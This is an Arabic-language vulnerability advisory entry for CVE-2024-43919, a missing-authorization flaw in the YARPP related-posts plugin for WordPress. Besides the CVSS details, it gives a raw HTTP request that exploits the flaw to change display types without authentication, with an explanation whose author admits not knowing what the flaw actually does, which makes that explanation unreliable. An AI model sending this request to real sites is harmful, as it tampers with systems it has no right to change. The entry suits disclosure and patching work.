
YARPP <= 5.30.10 - نقص التفويض
YARPP <= 5.30.10 - نقص التفويض
البرنامج المساعد YARPP – Yet Another Related Posts Plugin لووردبريس معرض للوصول غير المصرح به بسبب عدم وجود فحص صلاحية في ملف ~/includes/yarpp_pro_set_display_types.php في جميع الإصدارات حتى الإصدار 5.30.10. وهذا يسمح للمهاجمين غير المصادق عليهم بتعيين أنواع العرض.
Type: plugin
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE: CVE-2024-43919
Slug: yet-another-related-posts-plugin
ليس لدي أي فكرة عن ما يفعله هذا بالفعل.
فيما يلي مثال على طلب HTTP خام يستغل الثغرة في إضافة YARPP:
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com
في هذا الطلب:
ypsdt إلى false لتجاوز الفحص الأولي في الكود.types[] لتحديد أنواع العرض المراد تعيينها. في هذا المثال، تم تمرير post و page كأنواع.Host موقع ووردبريس الهدف الذي يستضيف إضافة YARPP الضعيفة.عند إرسال هذا الطلب إلى موقع ووردبريس يحتوي على إصدار ضعيف من إضافة YARPP المثبتة، سيتم تعيين أنواع العرض دون الحاجة إلى أي مصادقة أو تفويض.